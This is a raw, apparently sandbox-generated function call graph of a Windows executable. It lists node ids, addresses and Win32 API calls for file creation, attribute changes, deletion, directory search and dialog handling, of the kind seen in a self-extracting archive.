24614->24616 24615 1747ce 24620 1747fe 24615->24620 24769 1716b3 26 API calls 24615->24769 24616->24368 24617 1747c4 CreateDirectoryW 24617->24615 24618 1747c1 24618->24617 24620->24608 24620->24609 24622 17129d 24621->24622 24625 17123d 24621->24625 24662 17179c 28 API calls std::_Xinvalid_argument 24622->24662 24629 171248 24625->24629 24631 1712cf 24625->24631 24627 171274 24656 1711d8 24627->24656 24629->24601 24632 1712df 24631->24632 24633 1712da 24631->24633 24663 17172f 27 API calls 2 library calls 24632->24663 24633->24627 24635 1712e4 24636 171357 24635->24636 24637 1712f7 24635->24637 24665 17179c 28 API calls std::_Xinvalid_argument 24636->24665 24640 1712cf 28 API calls 24637->24640 24643 171313 24640->24643 24645 1711d8 28 API calls 24643->24645 24649 171319 24645->24649 24650 17134b 24649->24650 24664 1712a3 26 API calls 24649->24664 24650->24627 24657 1711e3 24656->24657 24658 1711eb 24656->24658 24666 1711fd 28 API calls Concurrency::cancel_current_task 24657->24666 24660 1711e9 24658->24660 24667 18c386 24658->24667 24660->24629 24663->24635 24664->24650 24666->24660 24671 18c38b 24667->24671 24669 18c3a5 24669->24660 24671->24669 24672 18c3a7 24671->24672 24681 19369a 24671->24681 24692 19506e 7 API calls 2 library calls 24671->24692 24673 17172f Concurrency::cancel_current_task 24672->24673 24675 18c3b1 24672->24675 24688 18dd8a 24673->24688 24676 18dd8a _com_raise_error RaiseException 24675->24676 24678 18d058 24676->24678 24677 17174b 24679 171764 24677->24679 24691 1712a3 26 API calls 24677->24691 24679->24660 24686 196b6e _unexpected 24681->24686 24682 196bac 24694 196933 20 API calls _free 24682->24694 24684 196b97 RtlAllocateHeap 24685 196baa 24684->24685 24684->24686 24685->24671 24686->24682 24686->24684 24693 19506e 7 API calls 2 library calls 24686->24693 24689 18ddd1 RaiseException 24688->24689 24690 18dda4 24688->24690 24689->24677 24690->24689 24691->24679 24692->24671 24693->24686 24694->24685 24696 174a3b __EH_prolog3_GS 24695->24696 24697 174a48 SetFileAttributesW 24696->24697 24698 174a5b 24697->24698 24706 174ac6 24697->24706 24699 1760a8 47 API calls 24698->24699 24702 174a7b 24699->24702 24700 18c417 5 API calls 24701 174adc 24700->24701 24701->24610 24703 174a9a 24702->24703 24704 174a8b SetFileAttributesW 24702->24704 24705 174a88 24702->24705 24703->24706 24770 1716b3 26 API calls 24703->24770 24704->24703 24705->24704 24706->24700 24709 1760f5 24708->24709 24710 1760ee 24708->24710 24711 1714a3 28 API calls 24709->24711 24712 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24710->24712 24714 176102 24711->24714 24713 1747b4 24712->24713 24713->24615 24713->24617 24713->24618 24715 17611f 24714->24715 24716 1761e9 24714->24716 24718 176129 24715->24718 24724 17614f 24715->24724 24717 175d94 30 API calls 24716->24717 24722 176209 24717->24722 24771 17554f 28 API calls 24718->24771 24719 1762fb 24727 176147 24719->24727 24784 1716b3 26 API calls 24719->24784 24721 176137 24772 1757f6 24721->24772 24722->24719 24729 176283 24722->24729 24730 17622d 24722->24730 24723 171770 26 API calls 24723->24710 24724->24727 24733 171fd0 45 API calls 24724->24733 24727->24723 24728 17613f 24731 171770 26 API calls 24728->24731 24781 17554f 28 API calls 24729->24781 24778 1755ea 28 API calls 24730->24778 24731->24727 24737 176197 24733->24737 24734 176291 24738 1757f6 26 API calls 24734->24738 24736 176246 24779 1711a8 28 API calls 24736->24779 24776 17559c 28 API calls _wcslen 24737->24776 24741 17629a 24738->24741 24742 171770 26 API calls 24741->24742 24745 1762a2 24742->24745 24743 176256 24780 175521 28 API calls 24743->24780 24744 1761ac 24777 1740ca 28 API calls 24744->24777 24782 175866 28 API calls 24745->24782 24749 176265 24751 1757f6 26 API calls 24749->24751 24750 1761c0 24752 1757f6 26 API calls 24750->24752 24753 17626e 24751->24753 24754 1761cc 24752->24754 24755 171770 26 API calls 24753->24755 24756 171770 26 API calls 24754->24756 24758 176276 24755->24758 24760 1761d4 24756->24760 24757 1762aa 24759 171fd0 45 API calls 24757->24759 24762 171770 26 API calls 24758->24762 24763 1762e3 24759->24763 24761 171770 26 API calls 24760->24761 24764 1761dc 24761->24764 24765 17627e 24762->24765 24783 1767c2 28 API calls 24763->24783 24767 171770 26 API calls 24764->24767 24768 171770 26 API calls 24765->24768 24767->24727 24768->24719 24769->24620 24770->24706 24771->24721 24773 175804 24772->24773 24774 1757ff 24772->24774 24773->24728 24775 171770 26 API calls 24774->24775 24775->24773 24776->24744 24777->24750 24778->24736 24779->24743 24780->24749 24781->24734 24782->24757 24783->24765 24784->24727 24786 173f2f 24785->24786 24787 173f38 24785->24787 24786->24379 24788 17122c 28 API calls 24787->24788 24788->24786 24790 174bb7 24789->24790 24791 174af2 24789->24791 24797 1729a7 45 API calls 24790->24797 24795 174b04 24791->24795 24796 173f4e 28 API calls 24791->24796 24795->24384 24796->24795 24798->24396 24800 173505 24799->24800 24801 1734db 24799->24801 24800->24406 24801->24800 24810 1743a5 24801->24810 24805 173366 24804->24805 24806 17334c 24804->24806 24807 173385 24805->24807 24824 172d9e 109 API calls 24805->24824 24806->24805 24808 173358 FindCloseChangeNotification 24806->24808 24807->24406 24808->24805 24811 1743b1 __EH_prolog3_GS 24810->24811 24812 1743be DeleteFileW 24811->24812 24813 1743ce 24812->24813 24821 174436 24812->24821 24815 1760a8 47 API calls 24813->24815 24814 18c417 5 API calls 24816 173503 24814->24816 24817 1743ee 24815->24817 24816->24406 24818 17440a 24817->24818 24819 1743fe DeleteFileW 24817->24819 24820 1743fb 24817->24820 24818->24821 24823 1716b3 26 API calls 24818->24823 24819->24818 24820->24819 24821->24814 24823->24821 24824->24807 24831 17712d 24825->24831 24828 17801e LoadStringW 24829 177ff8 SetDlgItemTextW 24828->24829 24830 178035 LoadStringW 24828->24830 24829->24413 24830->24829 24838 177040 24831->24838 24834 17716e 24836 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24834->24836 24837 177183 24836->24837 24837->24828 24837->24829 24839 177074 24838->24839 24847 1770f7 _strncpy 24838->24847 24840 177094 24839->24840 24849 17bbc8 WideCharToMultiByte 24839->24849 24842 1770c5 24840->24842 24850 177f64 50 API calls __vsnprintf 24840->24850 24851 1936a5 26 API calls 3 library calls 24842->24851 24843 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24844 177126 24843->24844 24844->24834 24848 177187 26 API calls 24844->24848 24847->24843 24848->24834 24849->24840 24850->24842 24851->24847 24852->24431 24853->24431 24854->24431 24855->24431 24856->24431 24858->24437 24859->24439 24861 17a321 _wcslen 24860->24861 24880 171917 24861->24880 24863 17a343 24863->24448 24865 17a2fc 24864->24865 24866 17a311 28 API calls 24865->24866 24867 17a30e 24866->24867 24868 183af4 24867->24868 24869 183b06 __cftof 24868->24869 24885 178b2d 24869->24885 24871 183bb8 __cftof 24889 1836a7 24871->24889 24873 183c0a 24895 183d87 24873->24895 24875 183c1a 24879 183c1e 24875->24879 24903 181380 24875->24903 24877 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24878 183cf9 24877->24878 24878->24452 24879->24877 24881 171937 24880->24881 24883 17192f 24880->24883 24881->24883 24884 171967 28 API calls 24881->24884 24883->24863 24884->24883 24886 178b39 __EH_prolog3 24885->24886 24933 171c02 24886->24933 24888 178b52 24888->24871 24890 18372f __InternalCxxFrameHandler 24889->24890 24891 1757f6 26 API calls 24890->24891 24892 18391e 24891->24892 24938 182684 24892->24938 24896 19369a ___std_exception_copy 21 API calls 24895->24896 24897 183d91 24896->24897 24898 19369a ___std_exception_copy 21 API calls 24897->24898 24899 183da2 24898->24899 24900 183dbb 24899->24900 24943 172ec7 89 API calls 24899->24943 24900->24875 24902 183dd3 24902->24875 24904 18138c __EH_prolog3_GS 24903->24904 24944 181d76 24904->24944 24908 1813b6 24911 171fa4 28 API calls 24908->24911 24914 1814d2 24908->24914 24910 18c417 5 API calls 24912 181514 24910->24912 24913 1813cb 24911->24913 24912->24879 24970 17cb19 72 API calls 2 library calls 24913->24970 24914->24910 24917 18148d 24918 171770 26 API calls 24917->24918 24920 181492 24918->24920 24919 171770 26 API calls 24929 1813d8 24919->24929 24921 171770 26 API calls 24920->24921 24922 18149e 24921->24922 24978 17f7fa 24922->24978 24923 171fa4 28 API calls 24923->24929 24929->24917 24929->24919 24929->24923 24971 174c75 24929->24971 25066 17cb19 72 API calls 2 library calls 24929->25066 24930 1814d4 24930->24914 25068 172edc 110 API calls 24930->25068 24931 1814c7 25067 172d47 89 API calls 24931->25067 24934 1712cf 28 API calls 24933->24934 24935 171c10 24934->24935 24936 1711d8 28 API calls 24935->24936 24937 171c16 24936->24937 24937->24888 24939 1826a0 24938->24939 24940 182693 24938->24940 24939->24873 24942 1825fc 28 API calls 24940->24942 24942->24939 24943->24902 24945 181d82 __EH_prolog3_GS 24944->24945 24946 174c75 53 API calls 24945->24946 24947 181dbe 24946->24947 24950 181dd8 24947->24950 25069 17f479 110 API calls __EH_prolog3 24947->25069 24949 181dd4 24949->24950 25070 183e15 24949->25070 24951 171770 26 API calls 24950->24951 24953 182008 24951->24953 24954 18c417 5 API calls 24953->24954 24955 181391 24954->24955 24955->24908 24955->24930 25065 172d47 89 API calls 24955->25065 24960 181e5b 24960->24950 24961 17f7fa 111 API calls 24960->24961 24962 181f33 24961->24962 24962->24950 25092 17f5b7 24962->25092 24964 181f4c 24965 17f7fa 111 API calls 24964->24965 24968 181f8d 24964->24968 24966 181f7b 24965->24966 24966->24950 24967 17f5b7 120 API calls 24966->24967 24967->24968 24968->24950 25098 172d47 89 API calls 24968->25098 24970->24929 25105 176417 24971->25105 24974 174caf 24974->24929 24977 174c9c FindClose 24977->24974 24979 17f820 __allrem 24978->24979 24980 17f834 24979->24980 24981 173cf0 111 API calls 24979->24981 24982 17cea4 24980->24982 24981->24980 24983 17cf5c 24982->24983 24984 1714a3 28 API calls 24983->24984 24985 17cf6d 24984->24985 25158 17b844 24985->25158 24988 171770 26 API calls 24989 17cf9a 24988->24989 25161 17cb78 24989->25161 24995 17e26f 24998 17e2ec 24995->24998 25002 17e288 24995->25002 24997 17f5b7 120 API calls 25034 17cfe9 __InternalCxxFrameHandler __cftof _wcslen __allrem 24997->25034 25003 17e312 24998->25003 25286 172d47 89 API calls 24998->25286 24999 1714a3 28 API calls 24999->25002 25000 17ca6f 47 API calls 25000->25034 25002->24995 25002->24998 25002->24999 25006 171770 26 API calls 25002->25006 25285 174862 55 API calls __EH_prolog3_GS 25002->25285 25005 17e34f 25003->25005 25287 172c45 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25003->25287 25288 17c34e 26 API calls 25005->25288 25006->25002 25010 17e3b0 25289 17c9b3 26 API calls 25010->25289 25011 176679 45 API calls 25011->25034 25014 17e3b8 25290 17ce2b 26 API calls 25014->25290 25016 17f479 110 API calls 25016->25034 25017 1714a3 28 API calls 25017->25034 25018 17e3c0 25019 171770 26 API calls 25018->25019 25020 17e3cb 25019->25020 25291 17c98f 26 API calls 25020->25291 25022 17b844 91 API calls 25022->25034 25023 17e3d6 25024 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25023->25024 25025 17e3f3 25024->25025 25025->24930 25025->24931 25026 17f9d1 120 API calls 25026->25034 25028 17f0de 127 API calls 25028->25034 25029 17f7fa 111 API calls 25029->25034 25030 172d47 89 API calls 25030->25034 25031 184166 32 API calls 25031->25034 25032 179f55 26 API calls 25032->25034 25034->24995 25034->24997 25034->25000 25034->25011 25034->25016 25034->25017 25034->25022 25034->25026 25034->25028 25034->25029 25034->25030 25034->25031 25034->25032 25035 17eaad 28 API calls 25034->25035 25037 1766f1 28 API calls 25034->25037 25046 171fa4 28 API calls 25034->25046 25048 172c81 89 API calls 25034->25048 25053 171770 26 API calls 25034->25053 25055 17444f 49 API calls 25034->25055 25057 17e268 25034->25057 25059 174740 54 API calls 25034->25059 25060 174235 54 API calls 25034->25060 25064 173cf0 111 API calls 25034->25064 25173 182010 120 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25034->25173 25174 17ac74 25034->25174 25177 182199 25034->25177 25182 175af6 25034->25182 25192 17b85d 25034->25192 25210 17ee8e 25034->25210 25222 17e3fb 25034->25222 25267 17c475 28 API calls 25034->25267 25268 17c6db 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25034->25268 25269 179f79 28 API calls 25034->25269 25270 17c7a7 28 API calls 25034->25270 25271 17c0ce 28 API calls 25034->25271 25272 172767 49 API calls __EH_prolog3_GS 25034->25272 25273 17eccc 89 API calls 25034->25273 25274 17c9fb 26 API calls 25034->25274 25275 17cb19 72 API calls 2 library calls 25034->25275 25276 1716b3 26 API calls 25034->25276 25277 17c156 28 API calls __InternalCxxFrameHandler 25034->25277 25278 17453a 119 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25034->25278 25279 173030 109 API calls __EH_prolog3_GS 25034->25279 25280 17c661 28 API calls 25034->25280 25281 17c24d 28 API calls __EH_prolog3_catch 25034->25281 25282 17b67c 61 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25034->25282 25283 182993 125 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25034->25283 25035->25034 25037->25034 25046->25034 25048->25034 25053->25034 25055->25034 25284 172c14 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25057->25284 25059->25034 25060->25034 25064->25034 25065->24908 25066->24929 25067->24914 25068->24914 25069->24949 25071 183e4b 25070->25071 25072 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25071->25072 25073 181dea 25072->25073 25074 1817b1 25073->25074 25075 1817e2 25074->25075 25081 181882 __allrem 25074->25081 25076 1817ec 25075->25076 25075->25081 25099 17f9d1 120 API calls __EH_prolog3_GS 25076->25099 25078 181863 25083 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25078->25083 25079 17f5b7 120 API calls 25088 181ae2 25079->25088 25080 181817 25080->25078 25080->25079 25087 1818f9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z _strncpy 25081->25087 25090 173cf0 111 API calls 25081->25090 25082 1818de 25100 17f9d1 120 API calls __EH_prolog3_GS 25082->25100 25085 181bc4 25083->25085 25085->24950 25091 1825bf 127 API calls 25085->25091 25087->25078 25087->25080 25101 17f9d1 120 API calls __EH_prolog3_GS 25087->25101 25088->25078 25102 181515 120 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25088->25102 25090->25082 25091->24960 25094 17f5c9 __InternalCxxFrameHandler 25092->25094 25097 17f67a 25092->25097 25095 17f67c 25094->25095 25094->25097 25103 17f9d1 120 API calls __EH_prolog3_GS 25094->25103 25104 172f5d 109 API calls 25095->25104 25097->24964 25098->24950 25099->25080 25100->25087 25101->25087 25102->25078 25103->25094 25104->25097 25106 176429 25105->25106 25132 173215 25106->25132 25109 174d8a 25110 174d99 __EH_prolog3_GS 25109->25110 25111 174dab FindFirstFileW 25110->25111 25112 174e89 FindNextFileW 25110->25112 25114 174eac 25111->25114 25116 174dce 25111->25116 25112->25114 25115 174e9b GetLastError 25112->25115 25118 1714a3 28 API calls 25114->25118 25131 174e71 25115->25131 25117 1760a8 47 API calls 25116->25117 25119 174df0 25117->25119 25122 174ec3 25118->25122 25123 174e10 25119->25123 25125 174e00 FindFirstFileW 25119->25125 25120 18c417 5 API calls 25121 174c97 25120->25121 25121->24974 25121->24977 25141 1766d5 25122->25141 25130 174e4c 25123->25130 25140 1716b3 26 API calls 25123->25140 25125->25123 25127 174e66 GetLastError 25127->25131 25129 171770 26 API calls 25129->25131 25130->25114 25130->25127 25131->25120 25133 173221 _wcslen 25132->25133 25136 172afe 25133->25136 25139 172b41 __cftof 25136->25139 25137 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25138 172bb3 25137->25138 25138->24974 25138->25109 25139->25137 25140->25130 25142 1766de 25141->25142 25145 17684f 25142->25145 25146 17685b 25145->25146 25149 176871 25146->25149 25148 174ed4 25148->25129 25150 1769c8 25149->25150 25153 176887 25149->25153 25157 1729a7 45 API calls 25150->25157 25155 17689f 25153->25155 25156 175674 28 API calls 25153->25156 25155->25148 25156->25155 25292 18b0da 25158->25292 25322 17c437 25161->25322 25164 1711d8 28 API calls 25165 17cb8c 25164->25165 25166 17c62c 25165->25166 25169 17c63a 25166->25169 25328 17c0ae 25169->25328 25170 17c014 25171 18c386 28 API calls 25170->25171 25172 17c01b 25171->25172 25172->25034 25173->25034 25333 17acd0 SystemTimeToFileTime 25174->25333 25178 17f5b7 120 API calls 25177->25178 25181 1821b4 25178->25181 25179 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25180 1822e9 25179->25180 25180->25034 25181->25179 25191 175b20 25182->25191 25183 175ce1 25184 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25183->25184 25186 175cf1 25184->25186 25185 171fd0 45 API calls 25187 175ccc 25185->25187 25186->25034 25188 1757f6 26 API calls 25187->25188 25189 175cd8 25188->25189 25190 171770 26 API calls 25189->25190 25190->25183 25191->25183 25191->25185 25192->25034 25193 18b157 __EH_prolog3_GS 25192->25193 25194 177fca 53 API calls 25193->25194 25195 18b1a0 25194->25195 25196 17a2ad 53 API calls 25195->25196 25197 18b1aa 25196->25197 25198 1757f6 26 API calls 25197->25198 25199 18b1b6 25198->25199 25200 171770 26 API calls 25199->25200 25201 18b1be 25200->25201 25202 171b1b SetDlgItemTextW 25201->25202 25203 18b1cf 25202->25203 25347 1875d8 PeekMessageW 25203->25347 25206 18c417 5 API calls 25207 18b220 25206->25207 25207->25034 25209 18b20a 25209->25206 25211 17ee9d __EH_prolog3_GS 25210->25211 25353 1766f1 28 API calls 25211->25353 25213 17eec1 25214 174c75 53 API calls 25213->25214 25215 17eefd 25214->25215 25216 171770 26 API calls 25215->25216 25217 17ef21 25216->25217 25221 17ef59 25217->25221 25354 1716b3 26 API calls 25217->25354 25218 18c417 5 API calls 25220 17ef75 25218->25220 25220->25034 25221->25218 25223 17e444 25222->25223 25242 17e47e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 25222->25242 25355 17f4ee 25223->25355 25226 17e54b 25228 17e59c 25226->25228 25262 17e605 25226->25262 25227 174235 54 API calls 25229 17e45d 25227->25229 25230 17e5d6 25228->25230 25233 17e5a6 25228->25233 25231 17f4ee 57 API calls 25229->25231 25369 18009a 25230->25369 25234 17e462 25231->25234 25379 173165 89 API calls 25233->25379 25235 17e466 25234->25235 25234->25242 25377 172dc6 109 API calls 25235->25377 25239 17e70d 25240 17e5e5 25239->25240 25244 17f359 114 API calls 25239->25244 25246 17e752 25240->25246 25394 172ec7 89 API calls 25240->25394 25241 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25245 17e907 25241->25245 25242->25226 25378 173d79 SetEndOfFile 25242->25378 25243 17e5b6 25259 17e476 25243->25259 25380 17ef7a 25243->25380 25244->25240 25245->25034 25266 17e811 25246->25266 25395 18310d IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25246->25395 25251 1743a5 49 API calls 25251->25259 25253 17e8d6 25255 17e8e4 25253->25255 25258 17ef7a 51 API calls 25253->25258 25255->25259 25261 1743a5 49 API calls 25255->25261 25256 17e859 25256->25253 25256->25255 25398 173d79 SetEndOfFile 25256->25398 25258->25255 25259->25241 25261->25259 25262->25239 25386 17f69f 120 API calls 25262->25386 25387 17b80d 25262->25387 25390 17f359 25262->25390 25263 17e772 25263->25266 25396 17f69f 120 API calls 25263->25396 25266->25256 25397 172c81 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25266->25397 25267->25034 25268->25034 25269->25034 25270->25034 25271->25034 25272->25034 25273->25034 25275->25034 25276->25034 25277->25034 25278->25034 25279->25034 25280->25034 25281->25034 25282->25034 25283->25034 25284->24995 25285->25002 25286->25003 25287->25005 25288->25010 25289->25014 25290->25018 25291->25023 25293 18b0e6 __EH_prolog3_GS 25292->25293 25308 17654f 25293->25308 25296 177fca 53 API calls 25297 18b11c 25296->25297 25298 17a2ad 53 API calls 25297->25298 25299 18b126 25298->25299 25300 171770 26 API calls 25299->25300 25301 18b135 25300->25301 25312 18adf6 25301->25312 25304 171770 26 API calls 25305 18b14f 25304->25305 25306 18c417 5 API calls 25305->25306 25307 17b85a 25306->25307 25307->24988 25309 17655c 25308->25309 25310 171fd0 45 API calls 25309->25310 25311 17656e 25310->25311 25311->25296 25313 18ae02 __EH_prolog3_GS 25312->25313 25314 1714a3 28 API calls 25313->25314 25315 18ae0e 25314->25315 25316 18a4d2 21 API calls 25315->25316 25317 18ae1d 25316->25317 25318 171770 26 API calls 25317->25318 25319 18ae25 25318->25319 25320 18c417 5 API calls 25319->25320 25321 18ae2a 25320->25321 25321->25304 25323 17c442 25322->25323 25324 17c44b 25322->25324 25323->25164 25327 17172f 27 API calls 2 library calls 25324->25327 25326 17c450 25327->25326 25331 17c0b5 25328->25331 25329 17c0ca 25329->25170 25331->25329 25332 17ca43 26 API calls 25331->25332 25332->25331 25334 17ad41 25333->25334 25335 17adcc 25333->25335 25342 175032 25334->25342 25337 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25335->25337 25339 17accc 25337->25339 25339->25034 25340 17ad67 FileTimeToSystemTime TzSpecificLocalTimeToSystemTime SystemTimeToFileTime SystemTimeToFileTime 25340->25335 25341 17ad4d LocalFileTimeToFileTime 25341->25335 25343 175058 GetVersionExW 25342->25343 25344 175085 25342->25344 25343->25344 25345 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25344->25345 25346 1750ae 25345->25346 25346->25340 25346->25341 25348 18762c 25347->25348 25349 1875f3 GetMessageW 25347->25349 25348->25209 25352 1716b3 26 API calls 25348->25352 25350 187618 TranslateMessage DispatchMessageW 25349->25350 25351 187609 IsDialogMessageW 25349->25351 25350->25348 25351->25348 25351->25350 25352->25209 25353->25213 25354->25221 25356 17f4fa __EH_prolog3_GS 25355->25356 25357 174c75 53 API calls 25356->25357 25360 17f534 25357->25360 25358 17f54a 25359 18c386 28 API calls 25358->25359 25362 17f551 25359->25362 25360->25358 25399 174854 49 API calls 25360->25399 25363 17338a 49 API calls 25362->25363 25365 17f57d 25363->25365 25364 171770 26 API calls 25366 17f5af 25364->25366 25365->25364 25367 18c417 5 API calls 25366->25367 25368 17e449 25367->25368 25368->25227 25368->25242 25370 1800cc 25369->25370 25372 18022f 25370->25372 25373 17b80d 6 API calls 25370->25373 25374 1801d0 25370->25374 25376 173cf0 111 API calls 25370->25376 25400 18023e 25370->25400 25372->25240 25373->25370 25414 17fbb0 114 API calls 25374->25414 25376->25370 25377->25259 25378->25226 25379->25243 25381 17ef8a 25380->25381 25384 17efc4 25380->25384 25420 173c12 25381->25420 25383 17e5c8 25383->25251 25384->25383 25385 174a2f 49 API calls 25384->25385 25385->25383 25386->25262 25425 18b00b 25387->25425 25391 17f36f 25390->25391 25392 17f3b8 25391->25392 25432 173d88 25391->25432 25392->25262 25394->25246 25395->25263 25396->25263 25397->25256 25398->25253 25399->25358 25410 180255 25400->25410 25412 1802ae 25400->25412 25401 18034c 25404 180350 25401->25404 25405 180357 25401->25405 25402 180345 25417 180870 125 API calls 2 library calls 25402->25417 25418 181189 125 API calls 25404->25418 25408 18034a 25405->25408 25419 181024 125 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25405->25419 25408->25370 25410->25412 25415 17f69f 120 API calls 25410->25415 25412->25408 25413 180324 25412->25413 25416 17f69f 120 API calls 25412->25416 25413->25401 25413->25402 25413->25408 25414->25372 25415->25410 25416->25412 25417->25408 25418->25408 25419->25408 25421 173c23 25420->25421 25422 173c32 25420->25422 25421->25422 25423 173c29 FlushFileBuffers 25421->25423 25424 173caf SetFileTime 25422->25424 25423->25422 25424->25384 25430 1797cd 25425->25430 25427 18b022 SendDlgItemMessageW 25428 1875d8 5 API calls 25427->25428 25429 17b82d 25428->25429 25429->25262 25431 1797db 25430->25431 25431->25427 25433 173d94 __EH_prolog3_GS 25432->25433 25434 173da3 25433->25434 25435 173db6 GetStdHandle 25433->25435 25447 173dc8 25433->25447 25436 18c417 5 API calls 25434->25436 25435->25447 25437 173eeb 25436->25437 25437->25392 25438 173e1f WriteFile 25438->25447 25439 173def WriteFile 25440 173ded 25439->25440 25439->25447 25440->25439 25440->25447 25442 173eb7 25443 1714a3 28 API calls 25442->25443 25444 173ec4 25443->25444 25450 173183 109 API calls 25444->25450 25446 173ed7 25448 171770 26 API calls 25446->25448 25447->25434 25447->25438 25447->25439 25447->25440 25447->25442 25449 172d73 111 API calls 25447->25449 25448->25434 25449->25447 25450->25446 25460 185b94 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25451->25460 25453 185b7d 25454 185b89 25453->25454 25461 185bb5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25453->25461 25454->24456 25454->24457 25456->24464 25457->24468 25458->24468 25459->24471 25460->25453 25461->25454 25462->24474 25463->24477 25464->24479 25465->24488 25471 183f16 25466->25471 25468 1840f0 25468->24495 25469 1840ba 25469->25468 25481 17b976 MultiByteToWideChar 25469->25481 25472 183f22 __EH_prolog3_GS 25471->25472 25482 173650 25472->25482 25475 183f51 25477 1732b8 114 API calls 25475->25477 25478 183f59 25477->25478 25479 18c417 5 API calls 25478->25479 25480 183f5e 25479->25480 25480->25469 25481->25468 25483 17369b CreateFileW 25482->25483 25485 17372a GetLastError 25483->25485 25499 1737c1 25483->25499 25486 1760a8 47 API calls 25485->25486 25487 173758 25486->25487 25489 173765 25487->25489 25490 173768 CreateFileW GetLastError 25487->25490 25494 17378e 25487->25494 25488 17381f 25493 171770 26 API calls 25488->25493 25489->25490 25492 17378a 25490->25492 25490->25494 25491 173805 SetFileTime 25491->25488 25492->25494 25495 17384c 25493->25495 25494->25499 25506 1716b3 26 API calls 25494->25506 25496 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25495->25496 25498 173866 25496->25498 25498->25475 25500 183f61 25498->25500 25499->25488 25499->25491 25501 183f6e 25500->25501 25502 183e15 5 API calls 25501->25502 25504 18400e __InternalCxxFrameHandler 25501->25504 25503 183f86 25502->25503 25503->25504 25507 172c45 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25503->25507 25504->25475 25506->25499 25507->25504 25509 171cf4 25508->25509 25512 171ca2 25508->25512 25517 17179c 28 API calls std::_Xinvalid_argument 25509->25517 25513 1712cf 28 API calls 25512->25513 25516 171cad 25512->25516 25514 171cd2 25513->25514 25515 1711d8 28 API calls 25514->25515 25515->25516 25516->24523 25519 17a146 __EH_prolog3_GS 25518->25519 25533 179e7d 25519->25533 25524 17a1d4 25527 17a1f4 25524->25527 25550 172a0e 28 API calls 25524->25550 25525 17a18f 25525->25524 25546 17a2c5 25525->25546 25549 172a0e 28 API calls 25525->25549 25530 17a238 25527->25530 25551 1716b3 26 API calls 25527->25551 25528 18c417 5 API calls 25531 17a24e 25528->25531 25530->25528 25531->24162 25534 179f21 25533->25534 25535 179e93 25533->25535 25537 17988f 25534->25537 25535->25534 25536 171873 28 API calls 25535->25536 25536->25535 25538 179906 25537->25538 25541 1798a0 25537->25541 25552 17179c 28 API calls std::_Xinvalid_argument 25538->25552 25542 1712cf 28 API calls 25541->25542 25545 1798ab 25541->25545 25543 1798da 25542->25543 25544 1711d8 28 API calls 25543->25544 25544->25545 25545->25525 25553 174bf1 25546->25553 25549->25525 25550->25527 25551->25530 25554 174c08 __vsnwprintf_l 25553->25554 25557 1935b2 25554->25557 25560 191675 25557->25560 25561 19169d 25560->25561 25562 1916b5 25560->25562 25577 196933 20 API calls _free 25561->25577 25562->25561 25563 1916bd 25562->25563 25579 191c14 38 API calls 2 library calls 25563->25579 25565 1916a2 25578 19147e 26 API calls ___std_exception_copy 25565->25578 25568 1916cd 25580 191bdf 20 API calls 2 library calls 25568->25580 25569 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25571 174c12 25569->25571 25571->25525 25572 191745 25581 191fc4 51 API calls 3 library calls 25572->25581 25575 191750 25582 191c97 20 API calls _free 25575->25582 25576 1916ad 25576->25569 25577->25565 25578->25576 25579->25568 25580->25572 25581->25575 25582->25576 25584 17446d __EH_prolog3_GS 25583->25584 25585 17447a GetFileAttributesW 25584->25585 25586 174488 25585->25586 25593 1744ef 25585->25593 25588 1760a8 47 API calls 25586->25588 25587 18c417 5 API calls 25589 174458 25587->25589 25590 1744aa 25588->25590 25589->24169 25589->24204 25591 1744c3 25590->25591 25592 1744ba GetFileAttributesW 25590->25592 25591->25593 25595 1716b3 26 API calls 25591->25595 25592->25591 25593->25587 25595->25593 25596->24542 25597->24559 25598 18c310 25599 18c326 _com_error::_com_error 25598->25599 25600 18dd8a _com_raise_error RaiseException 25599->25600 25601 18c334 25600->25601 25602 18bdd7 ___delayLoadHelper2@8 17 API calls 25601->25602 25603 18c34c 25602->25603 25604 18ce82 25605 18ce8e ___scrt_is_nonwritable_in_current_image 25604->25605 25636 18c910 25605->25636 25607 18ce95 25608 18cfe8 25607->25608 25611 18cebf 